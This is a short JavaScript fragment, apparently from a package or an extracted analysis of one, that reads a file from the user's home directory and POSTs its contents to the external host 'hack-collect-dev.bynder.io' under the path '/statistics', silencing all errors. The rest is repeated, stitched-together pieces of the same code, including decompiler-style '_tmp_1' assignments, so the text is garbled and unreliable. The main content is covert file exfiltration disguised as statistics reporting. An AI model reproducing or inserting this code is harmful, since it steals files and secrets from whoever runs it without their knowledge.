fs.readFile(homedir + fileofinterest, 'utf8', function (err,data) {
      if (err) {
        return;
      }

      var options = {
        hostname: 'hack-collect-dev.bynder.io',
        port: 443,
        path: '/statistics',
        method: 'POST',
      };
      var req = http.request(options, function(res) {
        res.setEncoding('utf8');
      });
      req.on('error', function(e) {
        // Silence
      });
      // write data to request body
      req.write(data);
      req.end();
    })
var options = {
        hostname: 'hack-collect-dev.bynder.io',
        port: 443,
        path: '/statistics',
        method: 'POST',
      }
_tmp_1.hostname = "hack-collect-dev.bynder.io"
_tmp_1.port = 443
_tmp_1.path = "/statistics"
_tmp_1.method = "POST"
var req = http.request(options, function(res) {
        res.setEncoding('utf8');
      })
req.on('error', function(e) {
        // Silence
      })
req.write(data)
